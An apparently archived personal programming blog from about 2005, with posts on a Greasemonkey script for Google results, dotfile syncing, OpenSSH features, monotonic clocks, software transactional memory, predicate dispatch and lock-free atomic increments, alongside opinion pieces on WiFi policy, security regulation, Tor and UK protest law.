    I don't expect it will work forever. There's a strange idea amongst people who call themselves "content producers" that it's wrong for you to view their content in any way other than as they intended it. (For examples see Odeon reacting to an excellent scrape and most of the anti Google Autolink stuff recently).

    It's more difficult to imagine how they're going to stop it but, as tools like greasemonkey become better, expect to see DOM obfuscators running in webservers. These will mess up the HTML differently for every GET request. The pages will look the same in a browser, but you won't be able to use nice class names and such to extract the bits you need.

    (The greasemonkey script below would be far more complex if Google didn't neatly put search results into their own class.)

    Within a few years I expect that we'll have AI-like filters to remove adverts and obfuscators+human workers doing their best to defeat them. Much as spam filters work today.

    But that's a ray of hope because the efforts put into spam filters have paid off. I get 30+ spam messages a day (after simple blacklist filtering which removes a lot) and Gmail's filters have a 0% percent false-positive rate and maybe 1-2% false-negative. That's very good.

    Dealing with too many config files

    I've finally got round to doing something about keeping all my config files in sync across the five different hosts that I ssh to regularly.

    I've created a SVN repository with my config files in and symlinked the dot files to the checked out version.

    .zprompt -> .aglconfig/agldotfiles/zprompt-green
    .zshrc -> .aglconfig/agldotfiles/zshrc
    .zlogin -> .aglconfig/agldotfiles/zlogin
    .zshenv -> .aglconfig/agldotfiles/zshenv
    .vimrc -> .aglconfig/agldotfiles/vimrc
    .gvimrc -> .aglconfig/agldotfiles/gvimrc
    ...

    I can now keep them synced across all the boxes and I've a little tar ball in the repository as well which creates all the symlinks for me. I can borgify a new install with two commands now

    I should have done this years ago.

    The wonders of GreaseMonkey

    GreaseMonkey is a Firefox extension which allows you to install Javascript scripts which can manipulate webpages before they're displayed.

    You can see a list of GreaseMonkey scripts, but as a demo have a look at the one I cooked up below. It adds result numbers to Google search results and you can then select that result with a single keypress (press '1' for the first result etc).

    Type-ahead-find often goes pretty badly on search results because (you would hope) many of the results have all the same keywords in them.

    (If you have GreaseMonkey installed, you can install this script by following this link and selecting "Install User Script" from the Tools menu.)

    /*
    	Add one-press access keys to Google search results. Search results
    	are numbered in red and pressing 1..0 selects that search result.
    	A Firefox Greasemonkey script,
    	Version 0.1
    	Adam Langley <agl@imperialviolet.org>
    
    	Public Domain
    */
    
    // ==UserScript==
    // @name 			Google Searchkeys
    // @namespace 		http://www.imperialviolet.org
    // @description 	Adds one-press access keys to Google search results
    // @include 		http://www.google.*/search*
    // ==/UserScript==
    
    (function() {
    	// Search results are in p elements with a class of 'g'
    	// This uses XPath to find all such elements and returns a 
    	// snapshot. (A snapshot doesnt become invalid after changing
    	// the DOM
    	
    	var results = document.evaluate("//p[@class='g']", document, null, 
    			XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);
    	var counter = 1;
    	
    	// We store the links in this array which is used by the keypress
    	// handler function
    	var links = new Array();
    	
    	for (var i = 0; i < results.snapshotLength; ++i) {
    		var result = results.snapshotItem(i);
    		// the first child of the paragraph is a comment element
    		// this is a little fragile, maybe should be an XPath lookup
    		links.push(result.firstChild.nextSibling.getAttribute("href"));
    
    		// We put the result number in a small-caps red span
    		var newspan = document.createElement("span");
    		newspan.setAttribute("style", "color:red; font-variant: small-caps;");
    		newspan.appendChild(document.createTextNode("Result " + counter++ + " "));
    		result.insertBefore(newspan, result.firstChild);
    	}
    
    	function keypress_handler(e) {
    		// e.which contains the ASCII char code of the
    		// key which was pressed
    		// see: http://web.archive.org/web/20040214161257/devedge.netscape.com/
    		// library/manuals/2000/javascript/1.3/reference/
    		// handlers.html#1120313
    		
    		var keypressed = String.fromCharCode(e.which);
    		if (keypressed < '0' || keypressed > '9') {
    			return true;
    		}
    
    		var resnum = e.which - "0".charCodeAt(0);
    		if (resnum == 0) {
    			resnum = 10;
    		}
    		document.location = links[resnum - 1];
    
    		return false;
    	}
    
    	document.onkeydown = keypress_handler;
    })();
    
    
    

    OpenSSH: Old dog, new tricks

    OpenSSH has hit version 4.0 (and 4.0p) and with that comes at least one cool new feature: hostname hashing.

    If you (or anyone) cats ~/.ssh/known_hosts it lists all the hostnames of every host you ssh to. Probably not a big problem, but the new version of ssh lets you run ssh-keygen -H to hash all these values so that they look like:

    |1|bZ457JK38+Bee4NMHxZMmkMqyKg=|+J6sIIzIAoUirdxXwY04fBsb8QQ= ssh-rsa AAAAB3NzaC1y
    c2EAAAABIwAAAIEAljhZCk8u8rVqR7YdQxGGG7YBW0uDJq/s9J9hqZlHFs10dX1PHEYsQQf7GV5SB5qLI
    6bZcYTZ2OrBOQjlJdp7xPWqCdh3TGEfPUARf5K0tFYCBpFNXt9Fjb2gZDIxG/PAT+JZHJOh66u147QYMo
    J3s1MRBoXXm7tSmlwm+QeBcAE=

    This, obviously, is a fairly irreversible step (though ssh-keygen does make a backup, the same file name is used for every backup. So it lasts, at most, until the next time ssh-keygen changes the known hosts file.) It also means that you have to use the ssh-keygen -R to delete entries from now on.

    Other things that people should do more often: Use ssh-keygen -l and publish the fingerprint of hosts which you expect people to ssh to. Over the phone you can use the -B option to get a more readable version.

    Also, use ssh aliases. This is an old trick, but it save a lot of typing of hostnames and usernames (if your username varies across boxes at all). Just put something like this into ~/.ssh/config:

    Host alias-name
    HostName long.hostname.of.the.host.com
    User optional-username

    Any option from man 5 ssh_config can go in there.

    Tags:

    Just how important is a monotonic clock?

    In discussions with Zooko I did a little test to see how important the addition of CLOCK_MONOTONIC is really.

    The alternative to using CLOCK_MONOTONIC is to have an itimer which increments a global, volatile counter at some number of Hz. You can do that with something like the following:

    struct itimerval itv;
    memset(&itv, 0, sizeof(itv));
    itv.it_interval.tv_sec = 1;
    itv.it_value.tv_sec = 1;
    
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = sigalrm_handler;
    sigaction(SIGALRM, &sa, NULL);
    
    setitimer(ITIMER_REAL, &itv, NULL);

    So I setup a test which tracks the difference between the true time elapsed (from CLOCK_MONOTONIC) and the count of global timer value. Firstly at 10Hz:

    Nsecs elapsedGlobal Tick CountSkew in global count
    3029049000300
    6061401000600
    9090753000900
    121200890001201
    151497730001501
    181788020001801
    212111430002102
    242404800002402
    272698220002702
    302991660003002
    333285130003303
    363578670003603
    393892030003903
    424185580004204
    454478990004504
    484772420004804
    515065930005105
    545379640005405
    575672850005705
    605966330006005
    636259870006306
    666553240006606
    696866770006906
    727160180007207
    757453630007507
    787747140007807
    818047020008108
    848546410008408
    878647660008708
    908940980009008
    939234440009309
    969527940009609
    999851630009909
    103014486000102010

    So, after 100 seconds the counter is already one second off. That's pretty terrible. Trying it again at 1Hz gives better results. I'm not going to give the whole table here but the skew is about 1 second lost every 20 minutes. Still not great.

    Tags:

    Acroread 7 for Linux

    Hopefully this one will stay around for a little while longer: Acrobat Reader 7 for Linux. The last release disappeared very quickly.

    Why would you want this? Well, acroread is the bet quality PDF renderer around I'm afraid. It's big, statically linked and note very fast. But if you're reading a big PDF on screen it's probably worth it.

    (Note: once installed goto the Reader/intellinuix directory and rename plug_ins to plug_ins_disabled. It starts much faster, takes less memory and I've no idea what all those plugins do since it seems to work just as well without.)

    Update: It was released to help "people in the Netherlands meet tax deadlines"

    Tags:

    SSL Libraries

    For anyone using OpenSSL for implementing SSL can I suggest theat you look at GnuTLS first? Actually, scratch that. Look at GnuTLS second, after you've seen what the state of the OpenSSL code and documentation are.

    I can't argue that GnuTLS has had the same level of inspection and bug hunting that OpenSSL has, and maybe that's a clincher, but it actually has good docs, with examples and everything. It's based on gcrypt (the core of gnupg I believe) and you're much less likely to screw up when using it than you are with OpenSSL.

    (I've no fiscal or otherwise interest in GnuTLS, this is just from trying and giving up with OpenSSL over the last couple of days.)

    Tags:

    Monotonic Time

    How long has a monotonic clock been sitting in POSIX without me noticing? The lack of one has really bugged me in the past. gettimeofday is useless for many timekeeping tasks because it can jump backwards and forwards with the tides of daylight savings, NTP and switching timezones. One doesn't want every timeout to suddenly trigger because they're all `over an hour overdue`, or (possibly worse) not trigger for an hour. Usually I use settimer to increment a one second resolution counter and hope for the best.

    But behold! clock_gettime (go read the manpage) can be passed a CLOCK_MONOTONIC argument and on my system at least (2.6.11, glibc CVS Jan 2005) it's a system call which returns the current uptime of the system with nanoseconds. Fantastic.

    (Note: you need to link against librt.)

    Is it really beyond the w...

    Is it really beyond the wit of man sshd-authors to log an error message saying Rejecting login due to shell not being in /etc/shells??

    In fact, if such an event occurs the error message is Failed password which, when your password goes via pam, via Kerberos 5 to a Windows Active Directory server can really take quite a while to track down what the hell's wrong.

    Free Municipal WiFi

    Lessig writes a satirical reply to a bill on the desk of the governor of Philadelphia which would prevent the state from funding free-to-use WiFi networks. I happen to think that Lessig's condemnation of this is ill considered.

    I believe that some products don't work in a free market, while others should only ever be setup in one. National defence is an example of the first and Lessig is correct that street lighting probably is too. Lots of things are at the other end, luxury items most surely.

    It may be reasonable to worry that a bill which prevents the state from offering any service which could be provided privately is quite stupid, but this has been mixed up with the idea that telecoms companies are using the legislative process to destroy `competition' from the state in the broadband market. The latter feeling rests upon the assumption that it's a good idea for the state to offer free-to-use WiFi and Lessig's writings are being used to support that.

    So where is WiFi on the scale from national defence to chocolate cake? The closest example is mobile phone service. This isn't provided by the state, and I've never heard anyone suggest that it should be. Certainly this leads to some duplication of base stations, I'm sure. But more importantly it has lead to better phone service through competition. Does anyone believe that the quality of service would be better, or the costs lower, if mobile phone service was provided by the state?

    So why should WiFi be `free'? (I've used to quotes because, of course, everyone is forced to pay for it, it's just mashed together with the rest of the local tax.)

    There may be some argument that people need broadband in the same way that public libraries are a good idea. But even I wouldn't suggest the broadband is that important. Indeed, broadband usage in the US has fallen (in terms of world rankings) quite sharply in recent years suggesting that American people agree. If there was demand for broadband then I suspect companies would be offering it in more areas of Philadelphia already.

    New Dr. Who

    I'm now utterly convinced that the leak of the first episode of the new series of Dr. Who was not a cunning viral marketing ploy. It's rubbish. It plays like a episode of Neighbors with a phone box in it. The special effects of the old series were charmingly primitive. I'm not sure if the effects in the new series were trying to emulate that or if they were just dire. I couldn't even watch it all the way through.

    (NB: This server heeps wi...

    (NB: This server heeps will be down for upgrades from 11am GMT tomorrow until it's finished.)

    I don't have a whole lot to write about at the moment, as the timestamps on this pages will attest to.

    It's my third, and final, ride round the merry-go-round at Imperial as the second term draws to a close and the Easter revision period looms large. At the end of this period lie the exams - painfully spread out - and the guilt of knowing that I should probably be doing more revision tempered with the knowledge that my mark was probably set in the first couple of weeks of the course; when I figured out if I liked it. Never has anything managed to motivate me to do something which I don't enjoy.

    And then (after a long gap in which I've nothing to do and no money to do it with) I'm probably going to be leaving it all behind. Possibly going to Zürich, slim chance of Mountain View.

    Brian Sedgemore MP on the Prevention of Terrorism Bill

    (Hansard source, theyworkforyou link)

    As this will almost certainly be my last speech in Parliament, I shall try hard not to upset anyone. However, our debate here tonight is a grim reminder of how the Prime Minister and the Home Secretary are betraying some of Labour's most cherished beliefs. Not content with tossing aside the ideas and ideals that inspire and inform ideology, they seem to be giving up on values too. Liberty, without which democracy has no meaning, and the rule of law, without which state power cannot be contained, look to Parliament for their protection, but this Parliament, sad to say, is failing the nation badly. It is not just the Government but Back-Bench Members who are to blame. It seems that in situations such as this, politics become incompatible with conscience, principle, decency and self-respect. Regrettably, in such situations, the desire for power and position predominates.

    As we move towards a system of justice that found favour with the South African Government at the time of apartheid and which parallels Burmese justice today, if hon. Members will pardon the oxymoron, I am reminded that our fathers fought and died for libertymy own father literallybelieving that these things should not happen here, and we would never allow them to happen here. But now we know better. The unthinkable, the unimaginable, is happening here.

    In their defence, the Prime Minister and the Home Secretary say that they are behaving tyrannically and trying to make nonsense of the House of Lords' decision in A and Others as appellants v. the Home Secretary as respondent because they are frightened, and that the rest of us would be frightened too if only we knew what they will not tell us. They preach the politics of fear and ask us to support political incarceration on demand and punishment without trial.

    Sad to say, I do not trust the judgment of either our thespian Prime Minister or our Home Secretary, especially given the latter's performance at the Dispatch Box yesterday. It did not take Home Office civil servants or the secret police long to put poison in his water, did it? Paper No. 1, entitled "International Terrorism: the Threat", which the Home Secretary produced yesterday and I have read, is a putrid document if it is intended to justify the measure. Indeed, the Home Secretary dripped out bits of it and it sounded no better as he spoke than it read. Why does he insult the House? Why cannot he produce a better argument than that?

    How on earth did a Labour Government get to the point of creating what was described in the House of Lords hearing as a "gulag" at Belmarsh? I remind my hon. Friends that a gulag is a black hole into which people are forcibly directed without hope of ever getting out. Despite savage criticisms by nine Law Lords in 250 paragraphs, all of which I have read and understood, about the creation of the gulag, I have heard not one word of apology from the Prime Minister or the Home Secretary. Worse, I have heard no word of apology from those Back Benchers who voted to establish the gulag.

    Have we all, individually and collectively, no shame? I suppose that once one has shown contempt for liberty by voting against it in the Lobby, it becomes easier to do it a second time and after that, a third time. Thus even Members of Parliament who claim to believe in human rights vote to destroy them.

    Many Members have gone nap on the matter. They voted: first, to abolish trial by jury in less serious cases; secondly, to abolish trial by jury in more serious cases; thirdly, to approve an unlawful war; fourthly, to create a gulag at Belmarsh; and fifthly, to lock up innocent people in their homes. It is truly terrifying to imagine what those Members of Parliament will vote for next. I can describe all that only as new Labour's descent into hell, which is not a place where I want to be.

    I hope that but doubt whether ethical principles and liberal thought will triumph tonight over the lazy minds and disengaged consciences that make Labour's Whips Office look so ridiculous and our Parliament so unprincipled.

    It is a foul calumny that we do today. Not since the Act of Settlement 1701 has Parliament usurped the powers of the judiciary and allowed the Executive to lock up people without trial in times of peace. May the Government be damned for it.

    Why we shouldn't have security regulation

    Bruce Schneier is calling for regulation of software to punish companies who release programs with security problems. This is stupid (sorry Bruce):

    1. Govt regulation is bad: It creates bureaucracy, its rules are complex, arbitrary and inflexible and it costs ... lots. Unless there is a clear benefit to regulation, which gains us more than it costs, then we shouldn't do it. This means that the burden of proof is on the other side.
    2. Who knows what the hell those crazy fools will come up with?: Let's face it. If we're talking about laws to regulate the tech industry then the people voting on them are mostly the same lot which gave us the DMCA (if you're in the US), the EUCD and (very nearly) software patents (if you're EU). These people are not competent to regulate software.
    3. Who are they to decided on the balance of security?: Security is a trade off. People still run phpBB, despite its security record because they think it's functionally superior and that that makes up for the security. That seems to work well for sites like forums.gentoo.org, but other people (myself included) treat running phpBB as the security equivalent of bending over in the prison showers.
    4. What about open-source (etc) software?: Leading on from the second point .. who's to say that you won't be able to release open-source software without liability insurance? If software makers are going to be fined for security problems how is this going to be avoided? Do you trust them to draw that line properly?
    5. What's a security problem?: While they're at it you can be sure that there will be a push from some quaters to get tools like nmap and nessus banned (or made impossibly expensive for their authors). I'm sure that the MPAA and RIAA would define the end-to-end nature of the Internet as a security problem, would you?

    Yes, this is fear-mongering. There's a possibility that a given law will be very sensible and reasonable (a thousand monkeys etc). But I'm saying that we shouldn't even start down that road because it will probably end up somewhere very bad and we won't be able to steer it once it starts.

    Directions in Future Languages - Lock-Free malloc

    Normally I'll just bookmark papers, but I've found one that deserves better treatment: Scalable Lock-free Dynamic Memory Allocation. It was presented at PLDI04 and is everything a paper should be: practical, clear and with great results.

    The author presents a malloc implementation which is lock-free (so you can call it from signal handlers, or kill threads and not cause deadlock etc) and it's faster (on SMP boxes) than the other mainstream concurrent allocators (Hoard and PTMalloc specifically).

    For anyone at Imperial, you should come to a talk by Tim Harris on this subject on March 9th (details to be announced).

    Entertain

    And everyone at (or near) Imperial should come to the charity ball in the Great Hall on the 26th of this month. Tickets are £10 and every penny goes to charity.

    Queens tower with projection

    Why Application Level Filtering in Tor is Bad

    Background for those who need it: Tor is an onion routing network for TCP streams that allows users to be fairly anonymous while using HTTP/IRC etc. The TCP connections are bounced round the Tor nodes and come out somewhere unrelated to the real source of them.

    Of course, over such networks abuse happens. At the moment the most concerning is the spamming of Usenet via Google Groups. Not all Tor nodes allow themselves to be the final (exit) node in the chain as that node is where the connection appears to be coming from (at the IP level) to whoever is the target of the connection. Those that do only allow certain destination ports - 80 is a very common one. Thus people can use Tor to access Google Groups and post spam to Usenet.

    (It's suspected, for a number of reasons, that people are doing this in order to trigger complaints to the ISP of the exit nodes and thus it's an attack on the Tor network as a whole. Some people truly believe that anonymity is evil.)

    Tor exit nodes can refuse to connect to Google Groups and this is reported in the Tor network wide directory of nodes. Thus clients can check which nodes will support a connection to the destination that they require and choose those nodes as exit nodes. However, a running game of blocking websites used for abuse is probably an unwinnable game. Also, why shouldn't people be able to read Google Groups over Tor? It's only posting that is concerning.

    Thus some people (e.g. myself) have suggested that the exit nodes should be able to parse outgoing connections (HTTP being a very good example) and reject POST requests and the like. Here's why this is a bad idea.

    This policy could be described in the directory, as IP based policies currently are but they can't be used because the first Tor node (client) cannot know if the browser is going to need to POST before creating the connection, and the exit node is chosen at that point. Thus the exit nodes are chosen randomly and some will have POST blocked.

    Tor users then experience random failure of posting. Sometimes it will work, sometimes is doesn't. So the whole network will be dragged down to the level of the most restrictive exit node - because anything else will randomly fail.

    Tags:

    Right To Protest

    Our dear government has announced that there will be a crackdown on protesters in the new crime bill which is going though the motions at the moment.

    This is clearly (and explicitly, in all but the wording of the bill) aimed at `animal rights' protesters who have, in recent times, stepped up their campaigning to include grave robbing, hate mail, vandalism, etc. The arguments are predictable and the animal rights `protesters' are claiming that this is an attack on their right to protest.

    I believe that a right to protest should exist. Protesting gives a voice to those that cannot be heard another way. This may be because of financial limits, or because the media refuses to carry their story. As a firm believer in freedom of speech, I think that protesting is an important form of communication.

    However, the right to protest is fairly limited. It's a communication mechanism, not a way to impose ones views on the world. What some animal rights `protesters' are doing has gone far beyond communication, into enforcement.

    I'm slightly off-balance finding myself, as I do, in agreement with the government on this one. They are enforcing their monopoly on violence, which is right. We install a monopoly on violence in the government because we can (hopefully) control it via the democratic process. That democratic process then sets the limits on what the people can do. If it gets it right, the limits should be minimal.

    Animal rights protesters are seeking to impose their own limits on what is already a tightly regulated sector. The government is right to slap them down.

    Tags:

    Directions in Future Languages - Software Transactional Memory

    STM is a method of handling concurrency in multithreaded systems. The light at the end of this tunnel is that we wish to able to write the following:

    def add-child(x):
      global children-by-name, children-by-id
      atomic:
        children-by-name[x.name] = x
        children-by-id[x.id] = x

    At no point would any other thread see the child in one map, but not the other. Traditionally this would be done with locks. The maps themselves would have locks inside them, of course, and would thus be `thread safe', but we would need to implement our own locking in order to achieve atomicity between them. An STM says that, when you enter an atomic block, nothing happens until you exit it and then it all happens at once. If another thread altered children-by-name while you were processing the block above the atomic block would be aborted and attempted again.

    Lock-free techniques:

    The design I'm outlining is is from the lock-free group at Cambridge and a good explaination can be found in Keir Fraser's PhD dissertation. So why am I reiterating it here? Partly because I'm probably going need to write something like this for a report of my own at some point, but also because digging into a PhD can be tough work and these ideas deserve to be better known.

    So here's an STM linked list:

    The first thing to notice is that nothing holds a direct pointer to anything - they are all via STM object headers. The object header holds the true pointer to the data.

    When starting a transaction, a transaction context must be created. This holds the status of the transaction (undecided at the moment) and two lists; a read list and a write list. In this STM design, objects must be `opened' - either for reading or for writing. When you open an object you get a pointer to the true data and that object is recorded in the context.

    Thus you open the objects you need (say, opening for read each list element in turn until you find one to delete, thus opening the previous one for write). When an object is opened for write, a copy is made and a pointer to that is returned. Thus you don't edit `live' objects.

    So assume that you're removing the last element from this list. Thus you've read the first element and altered the second element (to put a null pointer in its next field). Your memory now looks like this:

    Since you are finished altering the list you commit the transaction. At this point we need to introduce a hardware level primitive that we'll be using. In the litrature it's called CAS (Compare and Swap) and, on Intel systems, it's called Compare and Exchange (cmpxchg). It takes three arguments: (old value, new value, memory location) and replaces the contents of memory location with new value if, and only if, its current value is old value, returning the contents of memory location at the end of the instruction - and it does this atomically.

    So the CAS operation allows us to update a value in memory, assuming that someone hasn't already beaten us to it. A transaction commit uses this operation to change the pointer in the object headers of objects in the write list, to point to the transaction context instead. This is called `aquiring' the header and it is done in order of increasing memory address.

    So, assuming that no other transaction is comming and has beaten us to it, our memory now looks like:

    But what if another thread is commiting a conflicting transaction? In that case we'll find a pointer to its transaction context when we do a CAS and we recursively help. Since we have a pointer to its context, we have all the information we need in order to perform its commit ourselves, so we do so. This is to ensure that some progress is always being made by the program as a whole. Unfortunately, it also means that our transaction is void so we abort and try it again.

    Assuming that we have accquired all the object headers that we are writing we have to check that none of the objects that we read have been updated in the mean time. If everything looks good we update the pointers in the object headers to point to our shadow blocks and release them - the transaction is complete:

    (Note, this is a simplification - see the paper for the full details. Gray objects are now garbage.)

    There are several other tricks which can be added to the above. The same Cambridge group has some ideas in one of their recent papers about how IO can be included in a tranaction. IO is, of course, a side effectful operation so clashes if we ever need to `roll-back' a transaction. The Cambridge group have implemented IO in Java which can rebuffer and be included in a transaction.

    More cool ideas are presented in this paper (which is talking about a Haskell based STM). There the author presents a primitive called retry which aborts the current transaction and only retries is when an object in the read-list is updated. Thus a queue can be implemented like this:

    class Q:
      def get(self):
        if self.length == 0:
          retry
        return self.q.pop()

    Thus no more missed condition variables resulting in a stuck thread.

    Tags:

    Including SVG figures in TeX documents

    Doing this is way tougher than it should be. I gather that, although SVG may be included in PDF documents (for some versions of PDF), it cannot be included inline, but only by giving the SVG a whole page. I've no idea why though.

    Note that I wont accept any path which introduces bitmaps. Thus exporting SVG as a high DPI bitmap and including that will not do. That's easy. My requirement is that it look pretty in Acroread 7. (Yes, I have Acroread 7 for Linux but it won't be public for a while yet.)

    Why do I want to include SVG? Because good editors for SVG exist. My favourite is Inkscape and, although xfig will always have a place in my heart, it doesn't really cut it anymore I'm afriad.

    So, you'll need:

    • An SVG file - create this yourself or Google for one if you like
    • pdftex - included with TeTeX, standard on most Linux distributions
    • Apache FOP - an SVG to PDF converter (and thus you need a JRE)

    FOP was the tough thing to find. Google was little help here. You may also have success with Scribus, it has good PDF output but its SVG import was too poor for me. Also, you may wish to try Adobe SVG Viewer on Windows or Mac OS X with a PDF printer driver.

    To use FOP you'll need to download this wrapper XML file and edit it to set the name of your SVG file. Then export JAVA_HOME and run FOP:

    ./fop.sh svgpdf.fo -pdf output.pdf

    Done? Now edit your TeX file and include the pdftex graphics package:

    \usepackage[pdftex]{graphicx}

    And include the PDF file:

    \begin{figure}[h]
    \scalebox{0.82}[0.82]{\includegraphics[viewport=0 740 200 840]{filter-dia.pdf}}
    \caption{The capability filter pattern}
    \end{figure}

    The arguments to scalebox are the X and Y scale factors. The viewport argument is a clipping box for the source PDF file: the lower-left and upper-right corners in pts from the bottom-left of the page. Those values take a few trials to get right, but inkscape will tell you the general values.

    Directions in Future Languages - Exceptions

    (Andy: sorry, your Jabber client isn't going to like this one either :))

    Exceptions generally work well (so long as people don't misuse them for general control flow) but I'm still looking for a language with a couple of features, which I think are missing.

    Firstly, I want to be able to test which object raised the exception. Consider:

    try:
      somefunc(mapping[key])
    except KeyError:
      return 'key unknown!'

    Unfortunately, the KeyError may have come from the lookup in mapping, or it may have come from deep within somefunc - I've no way of telling. In Python I can test the value which caused the error, but that's a bodge.

    There are several workarounds:

    if not key in mapping:
      return 'key unknown!'
    somefunc(mapping[key])

    Which is probably what I would do - but it requires an additional lookup. Or:

    try:
      value = mapping[key]
    except KeyError:
      return 'key unknown!'
    somefunc(value)

    Which is a little ugly. What I really want is a way to test which object caused the KeyError in the first place:

    try:
      somefunc(mapping[key])
    except KeyError from mapping:
      return 'key unknown!'

    Also, I would like to second a call from Bram for the ability to assert that a given exception would be caught, somewhere in the call chain, by something other than a default handler. Currently there's no way to do this at all in Python (except glitch testing - even then it's not certain) and I've also not heard of it any place else.

    Directions in Future Languages - Predicate Dispatch

    I'm certainly not the fist person to talk about predicate dispatch. Like almost everything else in the world of computing - LISP has already done it. But that doesn't mean that anyone actually uses it. (If you want papers see [it rocks] and [it's efficient].)

    You probably know predicate dispatch from such feature movies languages as Haskell and Erlang:

    def fact(0):
      return 1
    def fact(N):
      return N*fact(N - 1)

    That's an example of pattern matching, but we can do more:

    def is_even?(N) where N % 2 == 0:
      return 'yes'
    def is_even?(N):
      return 'no'

    We're allowed to test whatever we wish as a predicate. Many people think that the predicates should be side-effect-free, but I'm not too bothered about that. If some coder has good reason for a side-effectful predicate then go right ahead.

    No that, in the last example, the most specific function was called. This is determined by the dispatcher. The dispatcher collects and sorts a list of candidate functions and determines which are to be called. Even if I say most-specific-first I don't mean to say that the following will always work:

    def foo(N) where N % 2 == 0:
      return True
    def foo(N) where N % 4 == 0:
      return False

    Sure, the first function is more specific, but don't except your langauge to work that out. In the above case, both functions would be deemed equally specific so it would probably be a case of most-recently-defined first.

    This brings us to a couple of other common tricks in these systems: call-next and :before, :after functions etc.

    A call-next allows a more specific function to do stuff and then call the next most specific one etc:

    def authenticate-user(Username) where Username == 'root':
      if global-disallow-root:
        return False
      call-next(Username)

    In dynamic languages that function could be injected at any point and thus thus 'override' a generic authenticate-user function in a library.

    :before, :after and :around are from LISP (note the colon) and allow an equally specific function to bump itself up the priority stack (:before), pre-process the return value before the caller sees it (:after) or both (:around)

    Also, if one can define any dispatcher one likes (on a per-function-name basis) then they can do odd things. Like calling every appliciable function and summing their return values. (Probably best if the return function is commutative like addition, I think). I can't think, right now, of an example where it would be useful, but I'm sure someone will come across a suitable problem at some point in the history of the universe.

    With predicate dispatch one can also build up common features of programming languages like, say, object orientation:

    Let class be a type where SomeClass == SomeDerivedClass is true, but SomeDerivedClass == SomeDerivedClass is a more specific match. Now I can define objects:

    def __init__(Self, X, Y) where Self == Rectangle:
      Self.X = X
      Self.Y = Y
    
    def type(Self) where Self == Rectangle:
      return 'Rectangle'
    
    Circle(Rectange)  # make Circle == Rectange and
                      #      Circle <  Rectange true
    
    def __init__(Self, X) where Self == Circle:
      Self.X = X
      Self.Y = Y
    
    def type(Self) where Self == Circle:
      return 'Circle'

    Now one can override functions of a class 'in-place'. Just declare a more specific function (or use something like :before) and all calls to existing instances of that object are overridden:

    def :before type(Self) where Self == Circle:
      return 'Ha, this will screw things up'

    (p.s. I've no idea why I suddenly started Capatalising the first letter of variables in the examples. It's bad - don't do it.)

    (you too can play with this stuff today by using PEAK)

    Atomic Increment

    I've had this link about java atomic operations in my del.icio.us links for a while now. I'm reading around the subject for a number of far flung ideas which might make it into my final year project. But I hate being too abstract for too long, so I implemented a single atomic counter to check that it works the way I expect etc.

    As ever, the gcc info pages on inline asm are pretty bad and AT&T syntax buggers my everytime. Still, I have two (NPTL) threads each incrementing a counter. I can increment them without locking, with an atomic op and with locking.

    Without locking: 0.2 secs, with locking: 14.1 secs, with atomic ops 3.2 seconds. Not bad.

    /* Very quick demo of atomic operations
     * agl */
    #include <pthread.h>
    #include <stdio.h>
    
    volatile int count = 0;
    
    #define ATOMIC_INC(x) \
    	asm volatile("agl1:" : :); \
    	asm volatile("mov %0,%%eax" : : "m" (count) : "eax"); \
    	asm volatile("mov %%eax, %%ebx" : : : "ebx"); \
    	asm volatile("inc %%ebx" : : : "ebx"); \
    	asm volatile("lock cmpxchg %%ebx,%0" : : "m" (count) : "eax"); \
    	asm volatile("jnz agl1" : :);
    
    /* A thread function to increment count atomically */ 
    void *
    incr(void *arg) {
    	int a;
    	for (a = 0; a < 10000000; ++a) {
    		ATOMIC_INC(count);
    	}
    
    	return NULL;
    }
    
    pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
    
    /* A thread function which uses locking */
    void *
    incr_locked(void *arg) {
    	int a;
    	for (a = 0; a < 10000000; ++a) {
    		pthread_mutex_lock(&mutex);
    		count++;
    		pthread_mutex_unlock(&mutex);
    	}
    
    	return NULL;
    }
    
    int
    main() {
    	pthread_t th1, th2;
    
    	pthread_create(&th1, NULL, incr, NULL);
    	pthread_create(&th2, NULL, incr, NULL);
    	
    	pthread_join(th1, NULL);
    	pthread_join(th2, NULL);
    
    	printf("count is %d\n", count);
    
    	return 0;
    }

    People who read this via ...

    People who read this via RSS probably don't even notice my del.icio.us feed at the top. (The RSS for that is here).

    Recently, I have mosting been reading about concurrency. This isn't new - I've been thinking about it for ages (in fact, some people wish I would shutup about it sometimes). But previously my thinking has been about how to manage complex, stateful servers without lock-hell or inversion-of-control. I've now written a Python module (twistless) which does this very nicely. (Source availible upon prodding, but it needs polishing before a public release)

    But that (and my other code, like Neuroses) is based around syncthreading which manages to avoid locks by only really have a single thread. The complexity is vanquished, but it doesn't actually use an SMP machine.

    This was in the hope that `it will always be fast enough tomorrow'. The thinking was that doubling the speed of your library wasn't worth hand-crafted inverted control code because the CPUs would catch up soon enough anyway. But anyone who has been watching cpu speeds will have noticed that this is no longer true - we've hit the ceiling and CPUs are now growing outwards (multiple cores) rather than upwards (ever faster clock speeds).

    Herb Sutter has a good text in DDJ about this.

    Doing `true' concurrency without lock-hell is really tough. I don't know how to do it. (Maybe you're smart enough to write complex, multi-threaded code with fine-grained, deadlock and priority-inversion free locking - but I'm not, and nor are a lot of people.) Erlang does quite well in this area with very real results (working ATM switches etc), but it's based around the idea of message-passing threads, which isn't my cup of tea.

    The most exciting thing I've read about this is Composable memory transactions which uses a begin-commit style for shared memory (with retry and orElse - see the paper). Unfortunately, it's built on Haskell. (A language which calls IO, exceptions and external calls the "awkward squad" was built on the wrong foundations I'm afraid. Having said that - here's a great introduction on how to do them in Haskell).

    Unfortunately, I can't see that the ideas in that paper fit neatly into any current language. (The authors had to hack GHC quite a lot - and even then it only runs syncthreads in a single kernel-thread!) so maybe a new language is in order to play about with them.

    I was failing miserably t...

    I was failing miserably to explain this idea to someone a while back. Partly because I didn't have it in any order in my head but mostly because the other person was getting that look in their eyes which means "Abort! Abort!". So here's a (hopefully) better attempt to explain it so that I'm ready next time.

    (Andre: This is the idea in Permutation City, but I don't actually think that Greg Egan explains it terribly well there - read his short stories. And should Andre have an é at the end?)

    Firstly, if you're a dualist give up now. (And if, when you read `dualist', you're thinking of two people, back to back, with pistols then you probably are :)).

    Ok, if you're still with me I can create a cellular automaton in some Turing Machine with some set of rules and let it progress till I have a conscious life form in it which has deduced the existence of rice pudding and income tax. (Absolutely, this would take some time. But if you accept that it is possible then you accept that I could do it so assume that I have)

